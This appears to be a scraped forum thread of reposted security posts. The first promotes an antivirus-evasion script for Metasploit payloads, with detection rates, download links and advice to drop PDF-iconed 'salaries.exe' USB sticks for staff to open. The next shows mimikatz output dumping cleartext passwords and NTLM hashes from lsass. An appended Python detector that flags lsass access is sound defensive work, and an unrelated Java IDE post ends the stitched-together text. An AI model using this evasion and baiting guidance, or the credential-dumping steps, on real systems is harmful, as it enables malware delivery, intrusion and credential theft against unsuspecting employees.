Some screen shots, download path and A.V bypass script comparisons below. At its best my script was only detected by 10 out of 46 Anti-Virus products, these depends on which stealth option you use. At its lowest it was about 14/15 A.V products found this. This is still bypasses 20+ more products than just encoding the payload using Mfsencode or Msfvenom. It uses Msfencode, but also pads the file and re-compiles the executable including a PDF icon. The file size and contents are never the same for every executable generated, this helps it avoid most Anti-Virus products. The more intelligent A.V products will still pick it up. 
Download from the NCC Open Source GitHub Repository below: https://github.com/nccgroup/metasploitavevasion Tested on Backtrack 5 and Kali only. Run as root. The exploit on the victim now opens minimised, thanks to @redmeat_uk for the info. It requires two very small files in order to create the PDF icon and AutoRun files. It will auto-download these if they are not within the directory. If it can’t download them it will continue, but it will not create the PDF icons. If you want to download these two files in advance, just get them below. Place them in the same directory as the script is stored. If you want to change the autorun.ico for your own icon, this will change the autorun icon. To change the exe icon is a little more complex, as it is compiled from the icon.res file. Google around and you can create this using windres.
wget http://www.commonexploits.com/tools/avoid/autorun.ico MD5 checksum: ebe763172e90b7f218d522b13abbc5c1
wget http://www.commonexploits.com/tools/avoid/icon.res MD5 checksum: 876caf8703c803d7a2359103adc9ce58
Select local system or remote. If you select local it will auto-grab your local IP address and use that. If you select alternative, it will ask you which IP address to listen on, then give you the msf listener code to run at the end. Enter the port number to listen on. If local it doesn’t really matter, but if external they may have some restrictions, so try port 80, 443 or 53. In a recent test I found workstations could talk directly outbound on DNS/53, so I could get an AutoRun shell out to the internet. There are 5 options for the payload. The more stealthy, the bigger the file. All this is doing is padding out with more random junk, which seems to reduce the detection ratio slightly. If size is not an issue, i.e. using a CD or USB, then try the most stealthy option for better results. I have not tested option 5 on online scanners as it exceeds the upload limit.
It then saves the executable out for you named salaries.exe; you can change the name at the top of the script header. You could use this and place it on a few USB sticks and leave them around the building; I am sure curious staff may want to open it, and as it has a PDF icon it helps. It also creates you an autorun directory: simply burn these to a CDROM to try an AutoRun shell or a U3 USB – normal USB sticks won’t AutoRun and obviously if the system has AutoRun disabled it will not work. It will then launch the listener locally. Or if you selected an alternative system, it will give you the code to copy and paste to start the listener. Then run the exploit and you will get your shell. In this case the AutoRun exploited without any user interaction. I ran this against 46 Anti-Virus products and got fairly good results. Below is a comparison I made with the most commonly known and used A.V avoidance tools and scripts.
Standard Metasploit payload (encoded)
Shell Code Exec
Vanish Script
AV0ID
Syringe
Quick high-level view on the above scripts.
Shell Code Exec: Great tool created by Bernardo Damele that did get round almost all A.V products. The shellcode exe now does get detected more as this file stays the same. Bernardo allows you to download the source code, so I believe a quick modification to the file and a recompile would get round this. Info here: Bernardo Damele A. G.: Execute Metasploit payloads bypassing any anti-virus Download here: https://github.com/inquisb/shellcodeexec This is also built into SET (Social Engineering Toolkit) under the media generator options.
Vanish Script: Great script that inspired my script. Created originally by Astr0baby in 2011 and modified by Vanish3r, it generates the Metasploit payload for you. It is getting detected more now. Download here: [bash] Vanish Script - Pastebin.com
Syringe: This works in a very similar way to Shellcode exec, but I found this to be very good and it got round a lot of A.V products.
This was the only tool that got around Microsoft A.V in my testing. Download here: https://code.google.com/p/syringe-antivirus-bypass/ Source: AV0id – Anti-Virus Bypass Metasploit Payload Generator Script | Common Exploits - Penetration Testing Information
  24. mimikatz: Tool To Recover Cleartext Passwords From Lsass I meant to blog about this a while ago, but never got round to it. Here’s a brief post about a very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged-on Windows users. Something that I’m sure most pentesters would find very useful. Here’s some sample output provided by the author:
mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connecté à un client !
Message du processus : Bienvenue dans un processus distant Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;434898
Package d'authentification : NTLM
Utilisateur principal : Gentil User
Domaine d'authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : password
tspkg : password
Authentification Id : 0;269806
Package d'authentification : NTLM
Utilisateur principal : Gentil Kiwi
Domaine d'authentification : vm-w7-ult
msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a }
wdigest : waza1234/
tspkg : waza1234/
I wondered why the cleartext password would need to be stored in LSASS – after all, every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash.
Tool: mimikatz | Blog de Gentil Kiwi Source: mimikatz: Tool To Recover Cleartext Passwords From Lsass | pentestmonkey
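One defender-side check that follows from the post above: the `inject::process lsass.exe sekurlsa.dll` step has to open a handle to lsass.exe with write and thread-creation rights, and a plain credential read needs at least read access to its memory, so endpoint telemetry that records process handle access (Sysmon Event ID 10, ProcessAccess, which is assumed here and is not mentioned in the post) can flag both patterns. The following is an added example, not code from the pentestmonkey post, from Gentil Kiwi or from mimikatz. The log records are constructed for this demo in a simplified key="value" form rather than real Sysmon XML; the field names and the Win32 access-right constants are the real ones, while the allowlist of processes that may legitimately touch lsass is an assumption to be tuned per host.

```python
"""Flag suspicious handle access to lsass.exe in Sysmon-style ProcessAccess
(Event ID 10) records.

Added example, not from the pentestmonkey post or from mimikatz. The sample
records are constructed in a simplified key="value" form, not real Sysmon XML.
"""
import re

# Win32 process access rights (winnt.h) relevant to reading from or
# injecting into another process.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Rights an injector needs (write into the target and start a thread there),
# as opposed to the read-only access a memory-dump style credential read needs.
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
READ_MASK = PROCESS_VM_READ

# Assumed allowlist of processes that legitimately open lsass on a typical
# host; this is an assumption for the demo and must be tuned per environment.
ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_line(line):
    """Parse one constructed key="value" record into a dict."""
    return dict(FIELD_RE.findall(line))


def classify(rec):
    """Return "inject", "read" or None (benign/irrelevant) for one record."""
    if rec.get("EventId") != "10":
        return None
    target = rec.get("TargetImage", "").lower().rsplit("\\", 1)[-1]
    if target != "lsass.exe":
        return None
    if rec.get("SourceImage", "").lower() in ALLOWLIST:
        return None
    granted = int(rec.get("GrantedAccess", "0"), 16)
    if granted & INJECT_MASK:
        return "inject"  # write/thread rights: DLL injection pattern
    if granted & READ_MASK:
        return "read"    # read rights only: memory read / dump pattern
    return None          # e.g. PROCESS_QUERY_LIMITED_INFORMATION alone


def scan(lines):
    """Return [(UtcTime, SourceImage, verdict)] for every suspicious record."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        verdict = classify(rec)
        if verdict:
            hits.append((rec.get("UtcTime"), rec.get("SourceImage"), verdict))
    return hits


# Constructed sample records (not real telemetry). Paths and times are made up.
SAMPLE_LOG = [
    'EventId="10" UtcTime="2013-09-08 10:00:01" SourceImage="C:\\Windows\\System32\\svchost.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess="0x1000"',
    'EventId="10" UtcTime="2013-09-08 10:00:03" SourceImage="C:\\Program Files\\Agent\\agent.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess="0x1000"',
    'EventId="10" UtcTime="2013-09-08 10:00:05" SourceImage="C:\\Users\\user\\Desktop\\mimikatz.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess="0x143A"',
    'EventId="10" UtcTime="2013-09-08 10:00:09" SourceImage="C:\\Temp\\dumper.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess="0x1410"',
    'EventId="1" UtcTime="2013-09-08 10:00:10" Image="C:\\Windows\\System32\\notepad.exe"',
    'EventId="10" UtcTime="2013-09-08 10:00:12" SourceImage="C:\\Windows\\System32\\taskmgr.exe" '
    'TargetImage="C:\\Windows\\System32\\notepad.exe" GrantedAccess="0x1FFFFF"',
]

if __name__ == "__main__":
    for when, src, verdict in scan(SAMPLE_LOG):
        print(f"{when}  {verdict:6}  {src}")
```

Of the six constructed records only two are reported: the mimikatz.exe access (0x143A includes CREATE_THREAD, VM_OPERATION and VM_WRITE, the injection pattern) and the dumper.exe access (0x1410 carries VM_READ only, the read pattern). The svchost.exe record is skipped by the allowlist, the agent.exe record because 0x1000 carries neither read nor write rights, and the other two because they are not ProcessAccess events against lsass at all.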
  25. Nytro

    java

    Netbeans, Eclipse? Supposedly this one is neat, but it's a trial: http://www.jetbrains.com/idea/download/ I haven't tried it.